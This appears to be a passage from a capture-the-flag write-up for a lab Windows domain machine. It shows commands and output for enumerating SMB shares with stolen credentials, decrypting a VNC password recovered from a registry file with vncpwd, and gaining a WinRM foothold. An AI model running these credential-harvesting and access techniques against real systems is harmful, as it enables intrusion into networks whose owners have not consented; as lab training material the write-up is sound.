SMB
I was able to retrieve a data share with the credentials for ryan.
β°β smbmap -H 10.10.10.182 -u 'r.thompson' -p 'rY4n5eva'
[+] IP: 10.10.10.182:445 Name: cascade.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
There was an html file the name of the account for TempAdmin.
-- New production network will be going live on Wednesday so keep an eye out for any issues.
-- We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).
-- The winner of the βBest GPOβ competition will be announced on Friday so get your submissions in soon.
There was also a .reg file that allowed me to view a hexed password for VNC.
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0fWe have to put the hex in the following format and pass it to the tool called vncpwd.
β°β echo '6bcf2a4b6e5aca0f' | xxd -r -p > vnc_enc_pass
ββξ² ο
Ό ξ± ο /home/kali/vncpwd ξ± ο ο¦ master ?2 ββββββββββββββββββββββββββββββββββββββββββββββββββββ β ξ³ root@kali ξ°
β°β ./vncpwd vnc_enc_pass
Password: sT333ve2
Now we have to do the same shit again
I validated the creds with crackmapexec and was able to get a foothold on the machine with winrm
Last updated